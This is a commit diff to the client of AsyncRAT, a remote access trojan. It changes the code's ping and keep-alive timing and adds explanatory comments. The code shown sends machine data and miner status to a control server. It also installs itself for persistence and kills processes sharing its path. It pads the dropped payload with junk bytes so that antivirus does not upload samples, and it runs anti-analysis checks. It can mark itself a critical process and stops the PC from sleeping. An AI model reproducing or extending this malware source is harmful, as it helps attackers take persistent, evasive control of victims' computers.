update

2019-10-09 07:49:20 +03:00 · 2019-10-09 07:49:20 +03:00 · 33fe5b69a5
commit 33fe5b69a5
parent be5d0d5424
4 changed files with 40 additions and 35 deletions
--- a/AsyncRAT-C#/Client/Connection/ClientSocket.cs
+++ b/AsyncRAT-C#/Client/Connection/ClientSocket.cs
@ -22,17 +22,19 @@ namespace Client.Connection
 {
    public static class ClientSocket
    {
-        public static Socket TcpClient { get; set; }
+        public static Socket TcpClient { get; set; } //Main socket
-        public static SslStream SslClient { get; set; }
+        public static SslStream SslClient { get; set; } //Main SSLstream
-        private static byte[] Buffer { get; set; }
+        private static byte[] Buffer { get; set; } //Socket buffer
-        private static long Buffersize { get; set; }
+        private static long Buffersize { get; set; } //Recevied size
-        private static Timer Tick { get; set; }
+        private static Timer KeepAlive { get; set; } //Send Performance
-        private static MemoryStream MS { get; set; }
+        private static MemoryStream MS { get; set; } //Socket MS
-        public static bool IsConnected { get; set; }
+        public static bool IsConnected { get; set; } //Check socket status
-        private static object SendSync { get; } = new object();
+        private static object SendSync { get; } = new object(); //Sync send
-        public static Stopwatch Pong { get; set; }
+        private static Timer Ping { get; set; } //Send ping interval
        public static int Interval { get; set; } //ping value
-        public static void InitializeClient()
+
        public static void InitializeClient() //Connect & reconnect
        {
            try
            {
@ -90,8 +92,7 @@ namespace Client.Connection
                    Buffer = new byte[4];
                    MS = new MemoryStream();
                    Send(IdSender.SendInfo());
-                    Tick = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000));
+                    KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 60 * 1000));
                    Pong = new Stopwatch();
                    SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
                }
                else
@ -126,7 +127,7 @@ namespace Client.Connection
            try
            {
-                Tick?.Dispose();
+                KeepAlive?.Dispose();
                SslClient?.Dispose();
                TcpClient?.Dispose();
                MS?.Dispose();
@ -134,7 +135,7 @@ namespace Client.Connection
            catch { }
        }
-        public static void ReadServertData(IAsyncResult ar)
+        public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
        {
            try
            {
@ -243,9 +244,15 @@ namespace Client.Connection
            msgpack.ForcePathObject("Packet").AsString = "Ping";
            msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"}   CPU {(int)IdSender.TheCPUCounter.NextValue()}%   RAM {(int)IdSender.TheMemCounter.NextValue()}%";
            Send(msgpack.Encode2Bytes());
-            Pong.Reset();
+            Ping?.Dispose();
-            Pong.Start();
+            Interval = 0;
            Ping = new Timer(new TimerCallback(Pong), null, 1, 1);
            GC.Collect();
        }
        private static void Pong(object obj)
        {
            Interval++;
        }
    }
 }
--- a/AsyncRAT-C#/Client/Handle
+++ b/AsyncRAT-C#/Client/Handle
@ -4,12 +4,8 @@ using Client.MessagePack;
 using Client.Connection;
 using System;
 using System.Diagnostics;
 using System.IO;
 using System.Net.Sockets;
 using System.Reflection;
 using System.Text;
 using System.Threading;
 using System.Windows.Forms;
 using System.Collections.Generic;
 using Microsoft.VisualBasic;
@ -25,12 +21,12 @@ namespace Client.Handle_Packet
                unpack_msgpack.DecodeFromBytes((byte[])data);
                switch (unpack_msgpack.ForcePathObject("Packet").AsString)
                {
-                    case "pong":
+                    case "pong": //send interval value to server
                        {
-                            ClientSocket.Pong.Stop();
+                            int interval = (int)ClientSocket.Interval;
                            MsgPack msgPack = new MsgPack();
                            msgPack.ForcePathObject("Packet").SetAsString("pong");
-                            msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Pong.ElapsedMilliseconds);
+                            msgPack.ForcePathObject("Message").SetAsInteger(interval);
                            ClientSocket.Send(msgPack.Encode2Bytes());
                            break;
                        }
@ -80,7 +76,7 @@ namespace Client.Handle_Packet
            }
        }
-        private static void Received()
+        private static void Received() //reset client forecolor
        {
            MsgPack msgpack = new MsgPack();
            msgpack.ForcePathObject("Packet").AsString = "Received";
@ -88,7 +84,7 @@ namespace Client.Handle_Packet
            Thread.Sleep(1000);
        }
-        public static void Error(string ex)
+        public static void Error(string ex) //send to logs
        {
            MsgPack msgpack = new MsgPack();
            msgpack.ForcePathObject("Packet").AsString = "Error";
--- a/AsyncRAT-C#/Client/Install/NormalStartup.cs
+++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs
@ -16,7 +16,7 @@ namespace Client.Install
            try
            {
                FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile));
-                if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName)
+                if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName) //check if payload is running from installation path
                {
                    for (int i = 0; i < 10; i++)
@ -24,7 +24,7 @@ namespace Client.Install
                        Thread.Sleep(1000);
                    }
-                    foreach (Process P in Process.GetProcesses())
+                    foreach (Process P in Process.GetProcesses()) //kill any process which shares same path
                    {
                        try
                        {
@ -33,7 +33,7 @@ namespace Client.Install
                        }
                        catch { }
                    }
-                    if (Methods.IsAdmin())
+                    if (Methods.IsAdmin()) //if payload is runnign as administrator install schtasks
                    {
                        Process proc = new Process
                        {
@ -64,6 +64,8 @@ namespace Client.Install
                    fs = new FileStream(installPath.FullName, FileMode.CreateNew);
                    byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
                    fs.Write(clientExe, 0, clientExe.Length);
                    //prevent AV from sending sample by increasing the payload size
                    byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)];
                    new Random().NextBytes(junk);
                    fs.Write(junk, 0, junk.Length);
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@ -23,25 +23,25 @@ namespace Client
            try
            {
-                if (!MutexControl.CreateMutex())
+                if (!MutexControl.CreateMutex()) //if current payload is a duplicate
                    Environment.Exit(0);
-                if (Convert.ToBoolean(Settings.Anti))
+                if (Convert.ToBoolean(Settings.Anti)) //run anti-virtual environment
                    Anti_Analysis.RunAntiAnalysis();
-                if (Convert.ToBoolean(Settings.Install))
+                if (Convert.ToBoolean(Settings.Install)) //drop payload [persistence]
                    NormalStartup.Install();
-                if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin())
+                if (Convert.ToBoolean(Settings.BDOS) && Methods.IsAdmin()) //active critical process
                    ProcessCritical.Set();
-                Methods.PreventSleep();
+                Methods.PreventSleep(); //prevent pc to idle\sleep
-                new CheckMiner().GetProcess();
+                new CheckMiner().GetProcess(); //check miner status
            }
            catch { }
-            while (true)
+            while (true) // ~ loop to check socket status
            {
                if (!ClientSocket.IsConnected)
                {